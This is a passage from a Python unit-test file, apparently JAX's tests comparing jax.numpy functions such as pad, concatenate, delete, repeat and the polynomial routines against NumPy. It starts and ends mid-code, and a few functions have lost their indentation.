        ((1, 2),), ((2.0, 3.14),),
        # (before, after)  (not in the docstring but works in numpy)
        (0, 0), (-8.0, 2.0),
        # (end_values,)
        (1,), (2,),
        # end_values
        0, 1, 100, 10.0, 3.5, 4.2, -5, -3
    ]
    if (pad_width != () and end_values != () and
        # following types lack precision
        dtype not in [np.int8, np.int16, np.float16, jnp.bfloat16])))
def testPadLinearRamp(self, shape, dtype, pad_width, end_values):
  """Checks jnp.pad against np.pad for mode="linear_ramp"."""
  # np.linspace semantics changed in 1.20 and linear_ramp depends on them.
  if numpy_version < (1, 20) and np.issubdtype(dtype, np.integer):
    raise unittest.SkipTest("NumPy 1.20 changed the semantics of np.linspace")
  rng = jtu.rand_default(self.rng())
  args_maker = lambda: [rng(shape, dtype)]
  pad_kwargs = dict(pad_width=pad_width, mode="linear_ramp",
                    end_values=end_values)
  np_fun = partial(np.pad, **pad_kwargs)
  jnp_fun = partial(jnp.pad, **pad_kwargs)
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
                          check_dtypes=shape is not jtu.PYTHON_SCALAR_SHAPE)
  self._CompileAndCheck(jnp_fun, args_maker)
def testPadEmpty(self):
arr = np.arange(6).reshape(2, 3)
pad_width = ((2, 3), (3, 1))
np_res = np.pad(arr, pad_width=pad_width, mode="empty")
jnp_res = jnp.pad(arr, pad_width=pad_width, mode="empty")
np.testing.assert_equal(np_res.shape, jnp_res.shape)
np.testing.assert_equal(arr, np_res[2:-3, 3:-1])
np.testing.assert_equal(arr, jnp_res[2:-3, 3:-1])
np.testing.assert_equal(np_res[2:-3, 3:-1], jnp_res[2:-3, 3:-1])
def testPadKwargs(self):
  """Each jnp.pad mode must accept its own kwargs and reject other modes' kwargs.

  Also verifies that an unknown mode raises NotImplementedError.
  """
  # Maps each padding mode to the keyword arguments it accepts.
  modes = {
      'constant': {'constant_values': 0},
      'edge': {},
      'linear_ramp': {'end_values': 0},
      'maximum': {'stat_length': None},
      'mean': {'stat_length': None},
      'median': {'stat_length': None},
      'minimum': {'stat_length': None},
      'reflect': {'reflect_type': 'even'},
      'symmetric': {'reflect_type': 'even'},
      'wrap': {},
      'empty': {}
  }
  arr = jnp.array([1, 2, 3])
  pad_width = 1
  # Iterate items() directly instead of keys() + a redundant modes[mode] lookup.
  for mode, allowed in modes.items():
    # Collect every kwarg belonging to some *other* mode's kwarg set.
    not_allowed = {}
    for kwargs in modes.values():
      if kwargs != allowed:
        not_allowed.update(kwargs)
    # Test if allowed keyword arguments pass
    jnp.pad(arr, pad_width, mode, **allowed)
    # Test if prohibited keyword arguments of other modes raise an error
    match = "unsupported keyword arguments for mode '{}'".format(mode)
    for key, value in not_allowed.items():
      with self.assertRaisesRegex(ValueError, match):
        jnp.pad(arr, pad_width, mode, **{key: value})
  # Test if unsupported mode raise error.
  unsupported_modes = [1, None, "foo"]
  for mode in unsupported_modes:
    match = "Unimplemented padding mode '{}' for np.pad.".format(mode)
    with self.assertRaisesRegex(NotImplementedError, match):
      jnp.pad(arr, pad_width, mode)
def testPadFunction(self):
  """jnp.pad with a callable `mode` must match np.pad given an equivalent callable."""
  def np_pad_with(vector, pad_width, iaxis, kwargs):
    # np.pad's callable protocol: mutate the passed 1-D vector in place
    # (no return value is expected).
    pad_value = kwargs.get('padder', 10)
    vector[:pad_width[0]] = pad_value
    vector[-pad_width[1]:] = pad_value
  def jnp_pad_with(vector, pad_width, iaxis, kwargs):
    # JAX arrays are immutable, so build and return an updated copy instead.
    pad_value = kwargs.get('padder', 10)
    vector = jax.ops.index_update(
        vector, jax.ops.index[:pad_width[0]], pad_value)
    vector = jax.ops.index_update(
        vector, jax.ops.index[-pad_width[1]:], pad_value)
    return vector
  arr = np.arange(6).reshape(2, 3)
  np_res = np.pad(arr, 2, np_pad_with)
  jnp_res = jnp.pad(arr, 2, jnp_pad_with)
  np.testing.assert_equal(np_res, jnp_res)
  # Extra keyword arguments (here `padder`) are forwarded to the callable.
  arr = np.arange(24).reshape(2, 3, 4)
  np_res = np.pad(arr, 1, np_pad_with, padder=100)
  jnp_res = jnp.pad(arr, 1, jnp_pad_with, padder=100)
  np.testing.assert_equal(np_res, jnp_res)
  # The callable-mode path must also work under jit compilation.
  rng = jtu.rand_default(self.rng())
  args_maker = lambda: [rng(arr.shape, arr.dtype)]
  jnp_fun = partial(jnp.pad, pad_width=1, mode=jnp_pad_with)
  self._CompileAndCheck(jnp_fun, args_maker)
def testPadWithNumpyPadWidth(self):
a = jnp.array([1, 2, 3, 4, 5])
f = jax.jit(
partial(
jnp.pad,
pad_width=np.asarray((2, 3)),
mode="constant",
constant_values=(4, 6)))
np.testing.assert_array_equal(
f(a),
np.pad(
a,
pad_width=np.asarray((2, 3)),
mode="constant",
constant_values=(4, 6)))
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape=[{}]_reps={}".format(
        jtu.format_shape_dtype_string(shape, dtype), reps),
     "shape": shape, "dtype": dtype, "reps": reps}
    for reps in [(), (2,), (3, 4), (2, 3, 4), (1, 0, 2)]
    for shape, dtype in _shape_and_dtypes(all_shapes, default_dtypes)
    ))
def testTile(self, shape, dtype, reps):
  """Compares jnp.tile with np.tile across shapes and repetition counts."""
  rng = jtu.rand_default(self.rng())
  np_fun = partial(np.tile, reps=reps)
  jnp_fun = partial(jnp.tile, reps=reps)
  args_maker = lambda: [rng(shape, dtype)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
                          check_dtypes=shape is not jtu.PYTHON_SCALAR_SHAPE)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}".format(
        jtu.format_shape_dtype_string(shape, dtype)),
     "shape": shape, "dtype": dtype}
    for shape in all_shapes
    for dtype in all_dtypes))
def testExtract(self, shape, dtype):
  """Compares jnp.extract with np.extract on condition arrays containing zeros."""
  rng = jtu.rand_some_zero(self.rng())
  make_args = lambda: [rng(shape, jnp.float32), rng(shape, dtype)]
  self._CheckAgainstNumpy(np.extract, jnp.extract, make_args)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_ncond={}_nfunc={}".format(
        jtu.format_shape_dtype_string(shape, dtype), ncond, nfunc),
     "shape": shape, "dtype": dtype, "ncond": ncond, "nfunc": nfunc}
    for ncond in [1, 2, 3]
    for nfunc in [ncond, ncond + 1]
    for shape in all_shapes
    for dtype in all_dtypes))
def testPiecewise(self, shape, dtype, ncond, nfunc):
  """Compares jnp.piecewise with np.piecewise for callable and scalar pieces."""
  rng = jtu.rand_default(self.rng())
  rng_bool = jtu.rand_int(self.rng(), 0, 2)
  # funclist deliberately mixes callables with plain scalars, both of which
  # np.piecewise accepts; truncated to nfunc (ncond or ncond + 1) entries.
  funclist = [lambda x: x - 1, 1, lambda x: x, 0][:nfunc]
  args_maker = lambda: (rng(shape, dtype), [rng_bool(shape, bool) for i in range(ncond)])
  np_fun = partial(np.piecewise, funclist=funclist)
  jnp_fun = partial(jnp.piecewise, funclist=funclist)
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=True)
  # This is a higher-order function, so the cache miss check will fail.
  self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=True, check_cache_misses=False)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "{}_perm={}_{}".format(
        jtu.format_shape_dtype_string(shape, dtype), perm, arg_type),
     "dtype": dtype, "shape": shape, "perm": perm, "arg_type": arg_type}
    for dtype in default_dtypes
    for shape in array_shapes
    for arg_type in ["splat", "value"]
    for perm in [None, tuple(np.random.RandomState(0).permutation(np.zeros(shape).ndim))]))
def testTransposeTuple(self, shape, dtype, perm, arg_type):
  """transpose must accept the permutation as one tuple or as splatted args."""
  rng = jtu.rand_some_zero(self.rng())
  args_maker = lambda: [rng(shape, dtype)]
  if arg_type == "value":
    np_fun = lambda a: a.transpose(perm)
    jnp_fun = lambda a: jnp.array(a).transpose(perm)
  else:
    # Splat form: a None permutation becomes zero positional arguments.
    splat = perm or ()
    np_fun = lambda a: a.transpose(*splat)
    jnp_fun = lambda a: jnp.array(a).transpose(*splat)
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=True)
  self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=True)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "{}_trim={}".format(
        jtu.format_shape_dtype_string(a_shape, dtype), trim),
     "dtype": dtype, "a_shape": a_shape, "trim": trim}
    for dtype in default_dtypes
    for a_shape in one_dim_array_shapes
    for trim in ["f", "b", "fb"]))
def testTrimZeros(self, a_shape, dtype, trim):
  """Compares jnp.trim_zeros with np.trim_zeros for front/back/both trimming."""
  rng = jtu.rand_some_zero(self.rng())
  args_maker = lambda: [rng(a_shape, dtype)]
  np_fun = partial(np.trim_zeros, trim=trim)
  jnp_fun = partial(jnp.trim_zeros, trim=trim)
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=True)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}_rank{}".format(
        jtu.format_shape_dtype_string(a_shape, dtype), rank),
     "dtype": dtype, "a_shape": a_shape, "rank": rank}
    for rank in (1, 2)
    for dtype in default_dtypes
    for a_shape in one_dim_array_shapes))
def testPoly(self, a_shape, dtype, rank):
  """Compares jnp.poly with np.poly for 1-D root vectors and 2-D matrices."""
  if dtype in (np.float16, jnp.bfloat16, np.int16):
    self.skipTest(f"{dtype} gets promoted to {np.float16}, which is not supported.")
  elif rank == 2 and jtu.device_under_test() in ("tpu", "gpu"):
    self.skipTest("Nonsymmetric eigendecomposition is only implemented on the CPU backend.")
  rng = jtu.rand_default(self.rng())
  # Per-dtype tolerances; TPU runs at reduced precision, hence looser bounds.
  tol = { np.int8: 1e-3, np.int32: 1e-3, np.float32: 1e-3, np.float64: 1e-6 }
  if jtu.device_under_test() == "tpu":
    tol[np.int32] = tol[np.float32] = 1e-1
  tol = jtu.tolerance(dtype, tol)
  # rank == 1 gives a root vector, rank == 2 a square matrix (tuple repetition).
  args_maker = lambda: [rng(a_shape * rank, dtype)]
  self._CheckAgainstNumpy(np.poly, jnp.poly, args_maker, check_dtypes=False, tol=tol)
  self._CompileAndCheck(jnp.poly, args_maker, check_dtypes=True, rtol=tol, atol=tol)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "a_shape={} , b_shape={}".format(
        jtu.format_shape_dtype_string(a_shape, dtype),
        jtu.format_shape_dtype_string(b_shape, dtype)),
     "dtype": dtype, "a_shape": a_shape, "b_shape" : b_shape}
    for dtype in default_dtypes
    for a_shape in one_dim_array_shapes
    for b_shape in one_dim_array_shapes))
def testPolyAdd(self, a_shape, b_shape, dtype):
  """Compares jnp.polyadd with np.polyadd on coefficient vectors."""
  rng = jtu.rand_default(self.rng())
  make_args = lambda: [rng(a_shape, dtype), rng(b_shape, dtype)]
  # The functions can be compared directly; no argument binding is needed.
  self._CheckAgainstNumpy(np.polyadd, jnp.polyadd, make_args, check_dtypes=True)
  self._CompileAndCheck(jnp.polyadd, make_args, check_dtypes=True)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "a_shape={} , b_shape={}".format(
        jtu.format_shape_dtype_string(a_shape, dtype),
        jtu.format_shape_dtype_string(b_shape, dtype)),
     "dtype": dtype, "a_shape": a_shape, "b_shape" : b_shape}
    for dtype in default_dtypes
    for a_shape in one_dim_array_shapes
    for b_shape in one_dim_array_shapes))
def testPolySub(self, a_shape, b_shape, dtype):
  """Compares jnp.polysub with np.polysub on coefficient vectors."""
  rng = jtu.rand_default(self.rng())
  make_args = lambda: [rng(a_shape, dtype), rng(b_shape, dtype)]
  # The functions can be compared directly; no argument binding is needed.
  self._CheckAgainstNumpy(np.polysub, jnp.polysub, make_args, check_dtypes=True)
  self._CompileAndCheck(jnp.polysub, make_args, check_dtypes=True)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}_order={}_k={}".format(
        jtu.format_shape_dtype_string(a_shape, dtype),
        order, k),
     "dtype": dtype, "a_shape": a_shape, "order" : order, "k": k}
    for dtype in default_dtypes
    for a_shape in one_dim_array_shapes
    for order in range(5)
    for k in [np.arange(order, dtype=dtype), np.ones(1, dtype), None]))
def testPolyInt(self, a_shape, order, k, dtype):
  """Compares jnp.polyint with np.polyint across orders and constant terms."""
  rng = jtu.rand_default(self.rng())
  np_fun = lambda coeffs: np.polyint(coeffs, m=order, k=k)
  jnp_fun = lambda coeffs: jnp.polyint(coeffs, m=order, k=k)
  make_args = lambda: [rng(a_shape, dtype)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, make_args, check_dtypes=False)
  self._CompileAndCheck(jnp_fun, make_args, check_dtypes=True)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}_order={}".format(
        jtu.format_shape_dtype_string(a_shape, dtype),
        order),
     "dtype": dtype, "a_shape": a_shape, "order" : order}
    for dtype in default_dtypes
    for a_shape in one_dim_array_shapes
    for order in range(5)))
def testPolyDer(self, a_shape, order, dtype):
  """Compares jnp.polyder with np.polyder across derivative orders."""
  rng = jtu.rand_default(self.rng())
  np_fun = lambda coeffs: np.polyder(coeffs, m=order)
  jnp_fun = lambda coeffs: jnp.polyder(coeffs, m=order)
  make_args = lambda: [rng(a_shape, dtype)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, make_args, check_dtypes=False)
  self._CompileAndCheck(jnp_fun, make_args, check_dtypes=True)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_ptype={}".format(ptype), "ptype": ptype}
    for ptype in ['int', 'np.int', 'jnp.int']))
def testIntegerPower(self, ptype):
  """Raising to a concrete integer power must lower to a single integer_pow."""
  exponents = {'int': 2, 'np.int': np.int32(2), 'jnp.int': jnp.int32(2)}
  jaxpr = api.make_jaxpr(partial(jnp.power, x2=exponents[ptype]))(1)
  eqns = jaxpr.jaxpr.eqns
  self.assertLen(eqns, 1)
  self.assertEqual(eqns[0].primitive, lax.integer_pow_p)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_x={}_y={}".format(x, y), "x": x, "y": y}
    for x in [-1, 0, 1]
    for y in [0, 32, 64, 128]))
def testIntegerPowerOverflow(self, x, y):
  """Regression test for https://github.com/google/jax/issues/5987."""
  make_args = lambda: [x, y]
  self._CheckAgainstNumpy(np.power, jnp.power, make_args)
  self._CompileAndCheck(jnp.power, make_args)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}_axis={}".format(
        jtu.format_shape_dtype_string(shape, dtype), axis),
     "shape": shape, "dtype": dtype, "axis": axis}
    for shape in all_shapes
    for dtype in all_dtypes
    for axis in [None] + list(range(len(shape)))))
def testCompress(self, shape, dtype, axis):
  """Compares jnp.compress with np.compress across shapes and axes."""
  rng = jtu.rand_some_zero(self.rng())
  # The condition vector length depends on whether the input is a scalar,
  # the whole (flattened) array, or a single axis.
  if shape in scalar_shapes or len(shape) == 0:
    cond_shape = (0,)
  elif axis is None:
    cond_shape = (prod(shape),)
  else:
    cond_shape = (shape[axis],)
  make_args = lambda: [rng(cond_shape, jnp.float32), rng(shape, dtype)]
  self._CheckAgainstNumpy(partial(np.compress, axis=axis),
                          partial(jnp.compress, axis=axis), make_args)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}_condition=array[{}]_axis={}".format(
        jtu.format_shape_dtype_string(shape, dtype), len(condition), axis),
     "shape": shape, "dtype": dtype, "condition": condition, "axis": axis}
    for shape in [(2, 3)]
    for dtype in int_dtypes
    # condition entries beyond axis size must be zero.
    for condition in [[1], [1, 0, 0, 0, 0, 0, 0]]
    for axis in [None, 0, 1]))
def testCompressMismatchedShapes(self, shape, dtype, condition, axis):
  """Condition vectors shorter or longer than the axis must match numpy."""
  rng = jtu.rand_default(self.rng())
  make_args = lambda: [np.array(condition), rng(shape, dtype)]
  self._CheckAgainstNumpy(partial(np.compress, axis=axis),
                          partial(jnp.compress, axis=axis), make_args)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}_axis={}".format(
        jtu.format_shape_dtype_string(shape, dtype), axis),
     "shape": shape, "dtype": dtype, "axis": axis}
    for shape in array_shapes
    for dtype in all_dtypes
    for axis in [None] + list(range(len(shape)))))
def testCompressMethod(self, shape, dtype, axis):
  """The array .compress() method must agree with np.compress."""
  rng = jtu.rand_some_zero(self.rng())
  # Condition length: 0 for scalars, full size for axis=None, else axis size.
  if shape in scalar_shapes or len(shape) == 0:
    cond_shape = (0,)
  elif axis is None:
    cond_shape = (prod(shape),)
  else:
    cond_shape = (shape[axis],)
  make_args = lambda: [rng(cond_shape, jnp.float32), rng(shape, dtype)]
  np_fun = lambda cond, arr: np.compress(cond, arr, axis=axis)
  jnp_fun = lambda cond, arr: arr.compress(cond, axis=axis)
  self._CheckAgainstNumpy(np_fun, jnp_fun, make_args)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_axis={}_baseshape=[{}]_dtypes=[{}]".format(
        axis, ",".join(str(d) for d in base_shape),
        ",".join(np.dtype(dtype).name for dtype in arg_dtypes)),
     "axis": axis, "base_shape": base_shape, "arg_dtypes": arg_dtypes}
    for num_arrs in [3]
    for arg_dtypes in itertools.combinations_with_replacement(default_dtypes, num_arrs)
    for base_shape in [(4,), (3, 4), (2, 3, 4)]
    for axis in range(-len(base_shape)+1, len(base_shape))))
def testConcatenate(self, axis, base_shape, arg_dtypes):
  """Compares jnp.concatenate with np.concatenate across mixed dtypes and axes."""
  rng = jtu.rand_default(self.rng())
  wrapped_axis = axis % len(base_shape)
  # Vary the concatenated axis's size per input (cycling 3, 1, 4).
  shapes = [base_shape[:wrapped_axis] + (size,) + base_shape[wrapped_axis+1:]
            for size, _ in zip(itertools.cycle([3, 1, 4]), arg_dtypes)]
  def np_fun(*args):
    # Upcast bfloat16 inputs to float32 before handing them to numpy
    # (presumably np.concatenate cannot handle bfloat16 natively — see callers),
    # then cast the result to jnp's promoted dtype so results are comparable.
    args = [x if x.dtype != jnp.bfloat16 else x.astype(np.float32)
            for x in args]
    dtype = functools.reduce(jnp.promote_types, arg_dtypes)
    return np.concatenate(args, axis=axis).astype(dtype)
  jnp_fun = lambda *args: jnp.concatenate(args, axis=axis)
  def args_maker():
    return [rng(shape, dtype) for shape, dtype in zip(shapes, arg_dtypes)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_axis={}".format(
        jtu.format_shape_dtype_string(shape, dtype), axis),
     "shape": shape, "dtype": dtype, "axis": axis}
    for shape in [(4, 1), (4, 3), (4, 5, 6)]
    for dtype in all_dtypes
    for axis in [None] + list(range(1 - len(shape), len(shape) - 1))))
def testConcatenateArray(self, shape, dtype, axis):
  """Concatenating a single array along its leading axis must match numpy."""
  rng = jtu.rand_default(self.rng())
  make_args = lambda: [rng(shape, dtype)]
  np_fun = partial(np.concatenate, axis=axis)
  jnp_fun = partial(jnp.concatenate, axis=axis)
  self._CheckAgainstNumpy(np_fun, jnp_fun, make_args)
  self._CompileAndCheck(jnp_fun, make_args)
def testConcatenateAxisNone(self):
# https://github.com/google/jax/issues/3419
a = jnp.array([[1, 2], [3, 4]])
b = jnp.array([[5]])
jnp.concatenate((a, b), axis=None)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_axis={}_baseshape=[{}]_dtypes=[{}]".format(
        axis, ",".join(str(d) for d in base_shape),
        ",".join(np.dtype(dtype).name for dtype in arg_dtypes)),
     "axis": axis, "base_shape": base_shape, "arg_dtypes": arg_dtypes}
    for arg_dtypes in itertools.combinations_with_replacement(default_dtypes, 2)
    for base_shape in [(4,), (3, 4), (2, 3, 4)]
    for axis in range(-len(base_shape)+1, len(base_shape))))
def testAppend(self, axis, base_shape, arg_dtypes):
  """Compares jnp.append with np.append across mixed dtypes and axes."""
  rng = jtu.rand_default(self.rng())
  wrapped_axis = axis % len(base_shape)
  # Vary the appended axis's size per input (cycling 3, 1, 4).
  shapes = [base_shape[:wrapped_axis] + (size,) + base_shape[wrapped_axis+1:]
            for size, _ in zip(itertools.cycle([3, 1, 4]), arg_dtypes)]
  def np_fun(arr, values):
    # Upcast bfloat16 to float32 for numpy, then cast the result to jnp's
    # promoted dtype so the reference matches jnp's type-promotion rules.
    arr = arr.astype(np.float32) if arr.dtype == jnp.bfloat16 else arr
    values = (values.astype(np.float32) if values.dtype == jnp.bfloat16
              else values)
    out = np.append(arr, values, axis=axis)
    return out.astype(jnp.promote_types(*arg_dtypes))
  jnp_fun = lambda arr, values: jnp.append(arr, values, axis=axis)
  def args_maker():
    return [rng(shape, dtype) for shape, dtype in zip(shapes, arg_dtypes)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_axis={}_idx={}".format(
        jtu.format_shape_dtype_string(shape, dtype), axis, idx),
     "dtype": dtype, "shape": shape, "axis": axis, "idx": idx}
    for shape in nonempty_nonscalar_array_shapes
    for dtype in all_dtypes
    for axis in [None] + list(range(-len(shape), len(shape)))
    for idx in (range(-prod(shape), prod(shape))
                if axis is None else
                range(-shape[axis], shape[axis]))))
def testDeleteInteger(self, shape, dtype, idx, axis):
  """Compares jnp.delete with np.delete for scalar integer indices."""
  rng = jtu.rand_default(self.rng())
  make_args = lambda: [rng(shape, dtype)]
  np_fun = lambda arr: np.delete(arr, idx, axis=axis)
  jnp_fun = lambda arr: jnp.delete(arr, idx, axis=axis)
  self._CheckAgainstNumpy(np_fun, jnp_fun, make_args)
  self._CompileAndCheck(jnp_fun, make_args)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_axis={}_slc={}".format(
        jtu.format_shape_dtype_string(shape, dtype), axis, slc),
     "dtype": dtype, "shape": shape, "axis": axis, "slc": slc}
    for shape in nonempty_nonscalar_array_shapes
    for dtype in all_dtypes
    for axis in [None] + list(range(-len(shape), len(shape)))
    for slc in [slice(None), slice(1, 3), slice(1, 5, 2)]))
def testDeleteSlice(self, shape, dtype, axis, slc):
  """Compares jnp.delete with np.delete for slice indices."""
  rng = jtu.rand_default(self.rng())
  make_args = lambda: [rng(shape, dtype)]
  np_fun = lambda arr: np.delete(arr, slc, axis=axis)
  jnp_fun = lambda arr: jnp.delete(arr, slc, axis=axis)
  self._CheckAgainstNumpy(np_fun, jnp_fun, make_args)
  self._CompileAndCheck(jnp_fun, make_args)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_axis={}_idx={}".format(
        jtu.format_shape_dtype_string(shape, dtype), axis,
        jtu.format_shape_dtype_string(idx_shape, int)),
     "dtype": dtype, "shape": shape, "axis": axis, "idx_shape": idx_shape}
    for shape in nonempty_nonscalar_array_shapes
    for dtype in all_dtypes
    for axis in [None] + list(range(-len(shape), len(shape)))
    for idx_shape in all_shapes))
def testDeleteIndexArray(self, shape, dtype, axis, idx_shape):
  """Compares jnp.delete with np.delete for arrays of indices."""
  rng = jtu.rand_default(self.rng())
  max_idx = np.zeros(shape).size if axis is None else np.zeros(shape).shape[axis]
  # Previous to numpy 1.19, negative indices were ignored so we don't test this.
  low = 0 if numpy_version < (1, 19, 0) else -max_idx
  idx = jtu.rand_int(self.rng(), low=low, high=max_idx)(idx_shape, int)
  make_args = lambda: [rng(shape, dtype)]
  np_fun = lambda arr: np.delete(arr, idx, axis=axis)
  jnp_fun = lambda arr: jnp.delete(arr, idx, axis=axis)
  self._CheckAgainstNumpy(np_fun, jnp_fun, make_args)
  self._CompileAndCheck(jnp_fun, make_args)
@unittest.skipIf(numpy_version < (1, 19), "boolean mask not supported in numpy < 1.19.0")
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_axis={}".format(
        jtu.format_shape_dtype_string(shape, dtype), axis),
     "dtype": dtype, "shape": shape, "axis": axis}
    for shape in nonempty_nonscalar_array_shapes
    for dtype in all_dtypes
    for axis in [None] + list(range(-len(shape), len(shape)))))
def testDeleteMaskArray(self, shape, dtype, axis):
  """Compares jnp.delete with np.delete for boolean mask indices."""
  rng = jtu.rand_default(self.rng())
  # The mask covers either the flattened array or the chosen axis.
  mask_size = np.zeros(shape).size if axis is None else np.zeros(shape).shape[axis]
  mask = jtu.rand_int(self.rng(), low=0, high=2)(mask_size, bool)
  make_args = lambda: [rng(shape, dtype)]
  np_fun = lambda arr: np.delete(arr, mask, axis=axis)
  jnp_fun = lambda arr: jnp.delete(arr, mask, axis=axis)
  self._CheckAgainstNumpy(np_fun, jnp_fun, make_args)
  self._CompileAndCheck(jnp_fun, make_args)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_axis={}_out_dims={}".format(
        jtu.format_shape_dtype_string(shape, dtype),
        axis, out_dims),
     "shape": shape, "dtype": dtype, "axis": axis, "out_dims": out_dims}
    for shape in nonempty_array_shapes
    for dtype in default_dtypes
    for axis in range(-len(shape), len(shape))
    for out_dims in [0, 1, 2]))
def testApplyAlongAxis(self, shape, dtype, axis, out_dims):
  """apply_along_axis must match numpy for 0-, 1- and 2-D slice results."""
  def func(x, out_dims):
    # Choose a per-slice function whose output rank equals out_dims.
    if out_dims == 0:
      return x.sum()
    if out_dims == 1:
      return x * x[0]
    if out_dims == 2:
      return x[:, None] + x[None, :]
    raise NotImplementedError(f"out_dims={out_dims}")
  rng = jtu.rand_default(self.rng())
  make_args = lambda: [rng(shape, dtype)]
  np_fun = lambda arr: np.apply_along_axis(func, axis, arr, out_dims=out_dims)
  jnp_fun = lambda arr: jnp.apply_along_axis(func, axis, arr, out_dims=out_dims)
  self._CheckAgainstNumpy(np_fun, jnp_fun, make_args)
  self._CompileAndCheck(jnp_fun, make_args)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_func={}_keepdims={}_axes={}".format(
        jtu.format_shape_dtype_string(shape, dtype),
        func, keepdims, axes),
     "shape": shape, "dtype": dtype, "func": func, "keepdims": keepdims, "axes": axes}
    for shape in nonempty_shapes
    for func in ["sum"]
    for keepdims in [True, False]
    for axes in itertools.combinations(range(len(shape)), 2)
    # Avoid low-precision types in sum()
    for dtype in default_dtypes if dtype not in [np.float16, jnp.bfloat16]))
def testApplyOverAxes(self, shape, dtype, func, keepdims, axes):
  """apply_over_axes must match numpy for a reduction applied over axis pairs."""
  reducer = lambda x, axis: getattr(x, func)(axis=axis, keepdims=keepdims)
  rng = jtu.rand_default(self.rng())
  make_args = lambda: (rng(shape, dtype),)
  np_fun = lambda a: np.apply_over_axes(reducer, a, axes)
  jnp_fun = lambda a: jnp.apply_over_axes(reducer, a, axes)
  self._CompileAndCheck(jnp_fun, make_args)
  self._CheckAgainstNumpy(np_fun, jnp_fun, make_args)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape=[{}]_axis={}_repeats={}_fixed_size={}".format(
        jtu.format_shape_dtype_string(shape, dtype),
        axis, repeats, fixed_size),
     "axis": axis, "shape": shape, "dtype": dtype, "repeats": repeats,
     'fixed_size': fixed_size}
    for repeats in [0, 1, 2]
    for shape, dtype in _shape_and_dtypes(all_shapes, default_dtypes)
    for axis in [None] + list(range(-len(shape), max(1, len(shape))))
    for fixed_size in [True, False]))
def testRepeat(self, axis, shape, dtype, repeats, fixed_size):
  """Compares jnp.repeat with np.repeat, with and without total_repeat_length."""
  rng = jtu.rand_default(self.rng())
  np_fun = lambda arg: np.repeat(arg, repeats=repeats, axis=axis)
  np_fun = _promote_like_jnp(np_fun)
  if fixed_size:
    # Derive the static output length from numpy, so repeats itself can be
    # passed as a traced argument (exercised by jnp_fun below).
    total_repeat_length = np.repeat(np.zeros(shape), repeats, axis).shape[axis or 0]
    jnp_fun = lambda arg, rep: jnp.repeat(arg, repeats=rep, axis=axis,
                                          total_repeat_length=total_repeat_length)
    jnp_args_maker = lambda: [rng(shape, dtype), repeats]
    # Closed-over repeats variant, comparable against the numpy reference.
    clo_fun = lambda arg: jnp.repeat(arg, repeats=repeats, axis=axis,
                                     total_repeat_length=total_repeat_length)
    clo_fun_args_maker = lambda: [rng(shape, dtype)]
    self._CompileAndCheck(jnp_fun, jnp_args_maker)
    self._CheckAgainstNumpy(np_fun, clo_fun, clo_fun_args_maker)
  else:
    # Now repeats is in a closure, so a constant.
    jnp_fun = lambda arg: jnp.repeat(arg, repeats=repeats, axis=axis)
    args_maker = lambda: [rng(shape, dtype)]
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
    self._CompileAndCheck(jnp_fun, args_maker)
def testRepeatScalarFastPath(self):
  """A scalar repeat count should take the fast path and emit a small jaxpr."""
  x = jnp.array([1, 2, 3, 4])
  jaxpr = api.make_jaxpr(lambda a: jnp.repeat(a, repeats=2))(x)
  self.assertLessEqual(len(jaxpr.jaxpr.eqns), 6)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_axis={}_ind={}_inv={}_count={}".format(
        jtu.format_shape_dtype_string(shape, dtype), axis,
        return_index, return_inverse, return_counts),
     "shape": shape, "dtype": dtype, "axis": axis,
     "return_index": return_index, "return_inverse": return_inverse,
     "return_counts": return_counts}
    for dtype in number_dtypes
    for shape in all_shapes
    for axis in [None] + list(range(len(shape)))
    for return_index in [False, True]
    for return_inverse in [False, True]
    for return_counts in [False, True]))
def testUnique(self, shape, dtype, axis, return_index, return_inverse, return_counts):
  """Compares jnp.unique with np.unique over all optional-output combinations."""
  if axis is not None and numpy_version < (1, 19) and np.empty(shape).size == 0:
